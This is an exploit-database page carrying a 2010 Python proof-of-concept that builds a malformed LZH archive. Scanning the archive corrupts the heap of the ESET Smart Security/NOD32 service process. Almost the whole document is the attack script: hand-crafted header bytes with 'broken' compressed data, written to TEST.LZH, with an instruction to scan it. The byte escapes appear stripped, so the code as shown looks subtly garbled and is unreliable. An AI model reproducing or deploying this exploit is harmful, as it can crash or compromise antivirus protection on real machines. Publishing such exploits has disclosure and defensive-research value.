ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit
# Published : 2010-05-07
# Author : Oleksiuk Dmitry, eSage Lab
# Previous Title : Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005
# Next Title : Winplot 2010 Buffer Overflow PoC

#
# ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64)
# LZH archive parsing PoC exploit.
#
# Scanning of malicious file causes heap corruption in context
# of the service process (ekrn.exe).
# See Dr. Watson log (drwtsn32.log) for details.
#
# USAGE: python eset_lzh.py (TEST.LZH will be created)
#
# (c) 2010 eSage Lab
# http://www.esagelab.com/
# support@esagelab.com
#

data = (
"x21"	           # Size of archived file header
"x83"             # Checksum of remaining bytes
"-lh"              # ID
"5"                # Compression method (LZW, Arithmetic Encoding)
"-"                # ID 
"x13x00x00x00" # Compressed size
"x30x00x00x00" # Uncompressed size
"xFBx3Ax6Cx3B" # Original file date/time
"x20x01"         # File attribute
"x08"             # File name length
"TEST.TXT"         # File name
"xDCx41x4Dx00x00x00x0Bx33x6Dx66x49x5D" # !!! broken LZW compressed data
"x23x08x8Ax78x00x00xC0x81xA5xC0xD7x20" #
)

print "ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH File parsing PoC exploit"
print "(c) 2010 eSage Lab"
print "----------------------------"

f = open("TEST.LZH", 'wb')
f.write(data)
f.close()

print "TEST.LZH (%d bytes) created" % len(data)
print "Now try to scan it with antivirus"